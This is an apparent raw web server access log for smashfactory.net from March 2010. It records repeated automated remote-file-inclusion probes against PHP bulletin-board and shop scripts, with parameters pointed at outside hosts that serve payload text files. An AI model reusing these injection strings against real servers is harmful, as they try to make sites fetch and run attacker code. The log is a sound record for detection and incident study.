209.217.76.226 - - [09/Mar/2010:18:53:02 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.224.132.89 - - [09/Mar/2010:18:53:10 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:55:49 -0800] "GET /logs/access_100205.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:57:41 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:57:41 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:18:57:41 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
189.108.172.26 - - [09/Mar/2010:18:59:37 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
189.108.172.26 - - [09/Mar/2010:18:59:37 -0800] "GET //bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
189.108.172.26 - - [09/Mar/2010:18:59:37 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:59:46 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:59:46 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:18:59:46 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:00:05 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:00:05 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:00:05 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:00:07 -0800] "GET /logs/access_100205.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:03:11 -0800] "GET //errors.php?error=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:03:11 -0800] "GET /logs///errors.php?error=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:03:11 -0800] "GET /logs/access.log%20%20///errors.php?error=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
189.108.172.26 - - [09/Mar/2010:19:03:47 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:04:18 -0800] "GET /logs/access_100205.log//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
216.104.46.66 - - [09/Mar/2010:19:07:06 -0800] "GET /logs/access.log///bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
216.104.46.66 - - [09/Mar/2010:19:07:06 -0800] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
216.104.46.66 - - [09/Mar/2010:19:07:07 -0800] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:07:56 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:11:05 -0800] "GET /logs/////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1387 "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:11:05 -0800] "GET /logs/access.log/////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:11:05 -0800] "GET ////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 793 "-" "Mozilla/5.0" "www.smashfactory.net"
189.108.172.26 - - [09/Mar/2010:19:11:22 -0800] "GET //bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
189.108.172.26 - - [09/Mar/2010:19:11:22 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
189.108.172.26 - - [09/Mar/2010:19:11:22 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:44 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:44 -0800] "GET /logs/access_100205.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:44 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:47 -0800] "GET /logs/////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 1387 "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:47 -0800] "GET /logs/access.log/////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:11:47 -0800] "GET ////////////////?_SERVER[DOCUMENT_ROOT]=http://art-investments.eu/id1???? HTTP/1.1" 200 793 "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:11:47 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:12:25 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:12:25 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
208.76.111.218 - - [09/Mar/2010:19:12:25 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:12:47 -0800] "GET //bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:12:52 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:12:52 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:13:12 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:13:13 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:13:13 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:14:09 -0800] "GET //bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:14:09 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
99.57.90.154 - - [09/Mar/2010:19:14:09 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://snusoft.ru//administrator/components/com_remository/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:10 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:10 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:10 -0800] "GET /logs/access_100205.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:14:30 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:14:30 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:14:30 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:36 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:36 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:14:36 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:17:34 -0800] "GET /logs/access_100205.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:18:31 -0800] "GET /logs/access_100205.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:22:54 -0800] "GET /logs/access_100205.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
92.48.119.75 - - [09/Mar/2010:19:23:14 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:39 -0800] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:39 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:39 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:47 -0800] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:47 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:23:47 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:40 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:40 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:40 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:51 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:51 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:25:51 -0800] "GET /logs/access.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:26:08 -0800] "GET /logs/access.log//bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:26:09 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "smashfactory.net"
209.217.76.226 - - [09/Mar/2010:19:26:09 -0800] "GET /logs/access_100205.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:26:09 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:27:12 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:27:16 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:30 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:30 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:30 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:40 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:40 -0800] "GET /logs/access.log%20%20/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:27:40 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:28:52 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:28:52 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:28:57 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:23 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:23 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:29 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:43 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:29:48 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /logs/access_100205.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /logs/access_100205.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
84.40.30.37 - - [09/Mar/2010:19:30:05 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:30:44 -0800] "GET /logs/access_100205.log//bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:30:44 -0800] "GET /bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:30:44 -0800] "GET /logs//bbs///delete_comment.php?board_skin_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:32:58 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:33:04 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:33:04 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:33:56 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:33:56 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
203.251.80.167 - - [09/Mar/2010:19:33:59 -0800] "GET /logs/access.log/e404.php?DOCUMENT_ROOT=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:34:37 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:34:37 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:34:37 -0800] "GET /logs/access.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:35:15 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:35:15 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.smashfactory.net"
110.45.145.178 - - [09/Mar/2010:19:35:15 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 200 1373 "-" "libwww-perl/5.79" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:35:36 -0800] "GET /logs/access.log/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:35:36 -0800] "GET /logs/delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
118.129.170.49 - - [09/Mar/2010:19:35:37 -0800] "GET /delete.php?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
